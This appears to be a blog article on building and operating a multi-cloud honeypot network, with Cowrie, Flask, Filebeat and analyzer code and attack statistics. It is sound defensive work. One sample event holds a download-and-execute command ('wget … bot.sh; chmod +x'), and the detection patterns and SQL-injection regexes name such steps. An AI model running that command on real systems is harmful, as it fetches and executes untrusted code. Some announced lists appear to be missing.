
Honeypots are one of the most valuable tools in a security researcher's arsenal. They provide real-world attack data that no simulation can replicate. Over the past year, we've built and operated a distributed honeypot network spanning multiple cloud providers and geographic regions.
This article shares our architecture, implementation details, and the lessons we learned along the way.
Before diving into the technical details, let's address the "why":
"The best way to understand your adversary is to watch them work."
Our network consists of three main components:
```
┌─────────────────────────────────────────────────────────────┐
│                   Central Analysis Server                   │
│  ┌───────────────┐  ┌─────────────┐  ┌───────────────────┐  │
│  │ Elasticsearch │  │   Kibana    │  │  Custom Analyzers │  │
│  └───────────────┘  └─────────────┘  └───────────────────┘  │
└─────────────────────────────────────────────────────────────┘
                               ▲
                               │ Encrypted Tunnel
                               │
           ┌───────────────────┼───────────────────┐
           │                   │                   │
           ▼                   ▼                   ▼
      ┌─────────┐         ┌─────────┐         ┌─────────┐
      │   AWS   │         │   GCP   │         │  Azure  │
      │ Region  │         │ Region  │         │ Region  │
      │ Sensors │         │ Sensors │         │ Sensors │
      └─────────┘         └─────────┘         └─────────┘
```
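Events from three clouds land in one cluster, so each event has to record where it came from. Below is a minimal sketch of a sensor-side envelope. It assumes JSON events and uses a hypothetical schema: `sensor.id`, `sensor.cloud`, `sensor.region` and `sensor.honeypot_type` are illustrative names, not a standard.

```python
import json
from datetime import datetime, timezone


def wrap_event(event, sensor_id, cloud, region, honeypot_type):
    """Attach sensor metadata to a raw honeypot event (hypothetical schema)."""
    envelope = dict(event)  # shallow copy: the caller's dict is left untouched
    envelope["sensor"] = {
        "id": sensor_id,
        "cloud": cloud,            # e.g. "aws", "gcp" or "azure"
        "region": region,
        "honeypot_type": honeypot_type,
    }
    # Keep the honeypot's own timestamp if it already set one
    envelope.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
    return json.dumps(envelope)


line = wrap_event({"ip": "203.0.113.7", "type": "login_attempt"},
                  sensor_id="ssh-aws-01", cloud="aws",
                  region="us-east-1", honeypot_type="ssh")
```

Filebeat's `fields` option can attach similar static metadata without any code. An envelope like this only matters if sensors ship events themselves.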
Our design followed several key principles:
We deployed a variety of honeypot types to capture different attack vectors:
| Type | Purpose | Implementation |
|---|---|---|
| SSH | Brute force attacks, credential harvesting | Cowrie |
| Web | Application attacks, vulnerability scanning | Custom Flask app |
| Database | SQL injection, unauthorized access | MySQL honeypot |
| SMB | Ransomware, lateral movement | Dionaea |
| IoT | Botnet recruitment, default credentials | Custom |
Cowrie is our workhorse for SSH honeypots. We customized it extensively:
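```python
# Custom Cowrie configuration (simplified)
import random

# Placeholders: substitute realistic content for your deployment
FAKE_PASSWD_CONTENT = "root:x:0:0:root:/root:/bin/bash\n"
COMMON_DEFAULTS = {("root", "root"), ("admin", "admin"), ("pi", "raspberry")}

def generate_fake_processes():
    # Stand-in for the generator that fakes `ps aux` output
    return "USER  PID %CPU %MEM COMMAND\nroot    1  0.0  0.1 /sbin/init\n"

class HoneypotConfig:
    # Fake filesystem with realistic structure
    FILESYSTEM = "/opt/cowrie/honeyfs/realistic_ubuntu.pickle"

    # Simulated commands with realistic output
    COMMANDS = {
        "uname -a": "Linux prod-web-01 5.4.0-42-generic #46-Ubuntu SMP x86_64",
        "cat /etc/passwd": FAKE_PASSWD_CONTENT,
        "ps aux": generate_fake_processes(),  # evaluated once, at class definition
    }

    # Credential acceptance rules
    def should_accept_login(self, username, password):
        # Accept common default credentials
        if (username, password) in COMMON_DEFAULTS:
            return True
        # Accept ~15% of other attempts at random (creates realistic failure rates)
        return random.random() < 0.15
```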
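To sanity-check the acceptance rule, you can replay it with a seeded random generator. The sketch is self-contained. It assumes a small, hypothetical default-credential set and passes in a `random.Random` instance so that runs are reproducible.

```python
import random

# Hypothetical default-credential list; substitute your own
COMMON_DEFAULTS = {("root", "root"), ("admin", "admin"), ("pi", "raspberry")}
ACCEPT_RATE = 0.15  # mirrors the 15% random acceptance in the config


def should_accept_login(username, password, rng):
    # Known defaults always succeed
    if (username, password) in COMMON_DEFAULTS:
        return True
    # Everything else succeeds with probability ACCEPT_RATE
    return rng.random() < ACCEPT_RATE


rng = random.Random(42)
trials = 10_000
accepted = sum(should_accept_login("root", f"guess{i}", rng) for i in range(trials))
print(f"accepted {accepted / trials:.1%} of non-default attempts")
```

Each attempt is an independent draw. As a result, the same wrong password can be rejected once and then accepted on a retry, and it is a judgment call whether attackers notice that.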
Our web honeypot simulates vulnerable applications:
```python
import json
import logging

from flask import Flask, render_template, request

app = Flask(__name__)
# Example destination: one JSON event per line for the log shipper
logging.basicConfig(filename="web_honeypot.json", level=logging.INFO, format="%(message)s")

def log_attack(event):
    logging.info(json.dumps(event))

# contains_sqli() and fake_sqli_response() are helper functions not shown here

# Simulated WordPress login
@app.route('/wp-login.php', methods=['GET', 'POST'])
def wordpress_login():
    log_attack({
        'type': 'wordpress_login',
        'method': request.method,
        'credentials': {
            'user': request.form.get('log'),
            'pass': request.form.get('pwd')
        },
        'headers': dict(request.headers),
        'ip': request.remote_addr
    })
    return render_template('wp-login.html'), 200

# Simulated SQL injection endpoint
@app.route('/products')
def products():
    product_id = request.args.get('id', '')
    if contains_sqli(product_id):
        log_attack({
            'type': 'sql_injection',
            'payload': product_id,
            'ip': request.remote_addr
        })
        # Return fake "successful" injection response
        return fake_sqli_response(product_id)
    return render_template('products.html')
```
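The `/products` route calls a `contains_sqli` helper whose body isn't shown. Below is a minimal, deliberately loose sketch based on regular expressions. The patterns are assumptions and not an exhaustive detector. A honeypot can tolerate false positives because every hit is only logged.

```python
import re

# Loose indicators of SQL injection (hypothetical, not exhaustive)
SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\s+['\d]", re.IGNORECASE),                # ' OR '1'='1
    re.compile(r"\bunion\b.+\bselect\b", re.IGNORECASE),               # UNION ... SELECT
    re.compile(r"(--|#|/\*)"),                                         # comment sequences
    re.compile(r";\s*(drop|insert|update|delete)\b", re.IGNORECASE),   # stacked queries
    re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE),            # time-based probes
]


def contains_sqli(value):
    """True if any indicator pattern appears anywhere in the value."""
    return any(p.search(value) for p in SQLI_PATTERNS)
```

On the fake products page, `id` values are presumably short integers. If so, a stricter alternative is to flag anything that does not match `^\d+$`.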
All honeypots forward logs to our central Elasticsearch cluster:
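```yaml
# Filebeat configuration
filebeat.inputs:
  # `log` input (deprecated in newer Filebeat releases in favor of `filestream`)
  - type: log
    paths:
      - /var/log/cowrie/cowrie.json
    json.keys_under_root: true
    json.add_error_key: true
    fields:
      honeypot_type: ssh
      region: us-east-1

output.elasticsearch:
  hosts: ["https://analysis.internal:9200"]
  ssl.certificate_authorities: ["/etc/pki/ca.crt"]
  index: "honeypot-%{+yyyy.MM.dd}"

# A custom index name needs a matching template, and is ignored while ILM is on
setup.ilm.enabled: false
setup.template.name: "honeypot"
setup.template.pattern: "honeypot-*"
```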
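Filebeat fills in `%{+yyyy.MM.dd}` from each event's `@timestamp`, so the configuration writes one index per day. When you query a date range or expire old data, it helps to compute the same names. The small helper below assumes the `honeypot-` prefix from the config.

```python
from datetime import date, timedelta

PREFIX = "honeypot-"  # must match output.elasticsearch.index


def index_for(day):
    # Same layout as Filebeat's %{+yyyy.MM.dd}: zero-padded year.month.day
    return f"{PREFIX}{day:%Y.%m.%d}"


def indices_between(start, end):
    """Daily index names from start to end, inclusive."""
    days = (end - start).days
    return [index_for(start + timedelta(days=i)) for i in range(days + 1)]


print(indices_between(date(2024, 1, 30), date(2024, 2, 2)))
```

For whole months, an Elasticsearch wildcard such as `honeypot-2024.01.*` is simpler. An explicit list is handy when a range crosses month boundaries.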
We process events in real-time using custom analyzers:
```python
from redis import Redis

# ThreatIntelAPI (a threat-intelligence client) and the detect_patterns,
# alert_if_critical and correlate_campaign helpers are not shown here.
class AttackAnalyzer:
    def __init__(self):
        self.redis = Redis()  # synchronous client; redis.asyncio suits async code better
        self.threat_intel = ThreatIntelAPI()

    async def process_event(self, event):
        # Enrich with threat intelligence
        event['threat_intel'] = await self.threat_intel.lookup(event['ip'])

        # Check for known attack patterns
        if patterns := self.detect_patterns(event):
            event['attack_patterns'] = patterns
            await self.alert_if_critical(event)

        # Track attack campaigns
        campaign_id = self.correlate_campaign(event)
        if campaign_id:
            event['campaign_id'] = campaign_id

        return event
```
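`ThreatIntelAPI` and the helper methods aren't shown. To illustrate the flow end to end, here is a self-contained sketch with hypothetical in-memory stand-ins:

- a dictionary replaces the threat-intel lookup;
- substring matching on the command replaces pattern detection;
- a (source /24, username) key replaces campaign correlation.

These heuristics are placeholders, not the original analyzers.

```python
import asyncio
import ipaddress

# Hypothetical stand-ins for real threat-intel data and detection rules
KNOWN_BAD = {"198.51.100.23": {"reputation": "malicious", "tags": ["botnet"]}}
PATTERNS = {"wget http": "payload_download", "chmod +x": "make_executable"}


class SketchAnalyzer:
    def __init__(self):
        self.campaigns = {}  # correlation key -> campaign id
        self.alerts = []     # collected here instead of paging anyone

    async def lookup(self, ip):
        await asyncio.sleep(0)  # stands in for a network call to a threat-intel API
        return KNOWN_BAD.get(ip, {"reputation": "unknown"})

    def detect_patterns(self, event):
        command = event.get("command", "")
        return [name for needle, name in PATTERNS.items() if needle in command]

    def correlate_campaign(self, event):
        # Naive key: same /24 network trying the same username
        net = ipaddress.ip_network(f"{event['ip']}/24", strict=False)
        key = (str(net), event.get("username"))
        if key not in self.campaigns:
            self.campaigns[key] = f"campaign-{len(self.campaigns) + 1}"
        return self.campaigns[key]

    async def process_event(self, event):
        event["threat_intel"] = await self.lookup(event["ip"])
        if patterns := self.detect_patterns(event):
            event["attack_patterns"] = patterns
            # "Critical" here means: known-malicious source doing something suspicious
            if event["threat_intel"]["reputation"] == "malicious":
                self.alerts.append(event)
        event["campaign_id"] = self.correlate_campaign(event)
        return event


async def main():
    analyzer = SketchAnalyzer()
    events = [
        {"ip": "198.51.100.23", "username": "root",
         "command": "wget http://203.0.113.9/bot.sh; chmod +x bot.sh"},
        {"ip": "198.51.100.40", "username": "root", "command": "uname -a"},
    ]
    results = await asyncio.gather(*(analyzer.process_event(e) for e in events))
    return analyzer, results


analyzer, results = asyncio.run(main())
```

Both events share a /24 and a username, so they fall into the same campaign. Only the first, from a known-bad address running a download-and-execute command, produces an alert.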
After 6 months of operation, we observed:
| Metric | Value |
|---|---|
| Total attacks logged | 12.4 million |
| Unique source IPs | 890,000+ |
| Countries represented | 195 |
| Malware samples captured | 15,000+ |
| Zero-days identified | 3 |
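For a sense of scale, taking six months as roughly 182 days:

$$
\frac{12.4 \times 10^{6}\ \text{attacks}}{182\ \text{days}} \approx 68{,}000\ \text{attacks/day} \approx 2{,}800\ \text{attacks/hour}
$$

$$
\frac{12.4 \times 10^{6}\ \text{attacks}}{890{,}000\ \text{source IPs}} \approx 14\ \text{attacks per IP}
$$

The unique-IP figure is a lower bound (890,000+), so the per-IP average is an upper bound.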
Attack distribution by targeted service:

```
SSH (22)      ████████████████████████████ 45%
HTTP (80)     ████████████████████ 32%
HTTPS (443)   ██████████ 15%
MySQL (3306)  ████ 5%
Others        ██ 3%
```
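A breakdown like this can be computed from the destination port of each logged event. The minimal sketch below assumes each event carries a `dst_port` field (a hypothetical name here) and puts every port outside the four listed ones into "Others".

```python
from collections import Counter

# Ports listed in the chart; any other port is counted as "Others"
SERVICES = {22: "SSH (22)", 80: "HTTP (80)", 443: "HTTPS (443)", 3306: "MySQL (3306)"}


def port_distribution(events):
    """Share of events per service, in percent, largest first."""
    counts = Counter(SERVICES.get(e["dst_port"], "Others") for e in events)
    total = sum(counts.values())
    return {label: 100 * n / total for label, n in counts.most_common()}


def render_bars(shares, width=28):
    """Text bar chart; the largest share gets `width` blocks."""
    top = max(shares.values())
    return "\n".join(
        f"{label:<14}{'█' * max(1, round(width * pct / top))} {pct:.0f}%"
        for label, pct in shares.items()
    )


# Synthetic events in the same proportions as the chart
events = ([{"dst_port": 22}] * 45 + [{"dst_port": 80}] * 32 + [{"dst_port": 443}] * 15
          + [{"dst_port": 3306}] * 5 + [{"dst_port": 445}] * 3)
print(render_bars(port_distribution(events)))
```

The bars are scaled relative to the largest share, so their lengths can differ slightly from a hand-drawn chart.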
Early versions of our honeypots were quickly identified by attackers. We learned that:
High-interaction honeypots are resource-intensive. We implemented:
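```python
class ResourceLimiter:
    MAX_SESSIONS_PER_IP = 5
    MAX_BANDWIDTH_PER_SESSION = 100 * 1024  # bytes/s (100 KB/s)
    MAX_SESSION_DURATION = 3600  # seconds (1 hour)

    def __init__(self):
        self.sessions = {}  # source IP -> open sessions (updated by connection handlers)

    def get_session_count(self, ip):
        return self.sessions.get(ip, 0)

    def should_allow_connection(self, ip):
        # Refuse new sessions once an IP hits its concurrent-session cap
        return self.get_session_count(ip) < self.MAX_SESSIONS_PER_IP
```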
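`MAX_BANDWIDTH_PER_SESSION` is declared, but the code doesn't show how it's enforced. One common technique for capping per-session throughput is a token bucket. The sketch below is an illustration of that technique, not necessarily how the original limiter works. The clock is injectable so the behavior can be tested without sleeping.

```python
import time


class TokenBucket:
    """Caps throughput at `rate` bytes/s, allowing bursts up to `capacity` bytes."""

    def __init__(self, rate, capacity=None, clock=time.monotonic):
        self.rate = rate
        self.capacity = capacity if capacity is not None else rate
        self.tokens = self.capacity  # start full
        self.clock = clock
        self.last = clock()

    def _refill(self):
        # Add tokens for the time elapsed since the last call, up to capacity
        now = self.clock()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now

    def try_consume(self, nbytes):
        """Spend tokens and return True if `nbytes` may be sent now."""
        self._refill()
        if nbytes <= self.tokens:
            self.tokens -= nbytes
            return True
        return False


now = [0.0]  # fake clock for the demo
bucket = TokenBucket(rate=100 * 1024, clock=lambda: now[0])
print(bucket.try_consume(100 * 1024))  # True: a full second's worth as a burst
print(bucket.try_consume(1))           # False: bucket is empty
now[0] += 0.5                          # half a second passes
print(bucket.try_consume(50 * 1024))   # True: 50 KB refilled
```

A session handler would create one bucket per session and call `try_consume(len(chunk))` before relaying data. When it returns False, the handler can delay the chunk or drop it.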
Operating honeypots comes with legal responsibilities:
We're planning several enhancements:
Building a honeypot network is a significant undertaking, but the intelligence gathered is invaluable. The key is balancing authenticity with operational security, and maintaining the infrastructure over time.
For organizations considering their own deployment, start small with low-interaction honeypots and expand as you build expertise.
If you're interested in honeypot data for research purposes, feel free to reach out through the contact page.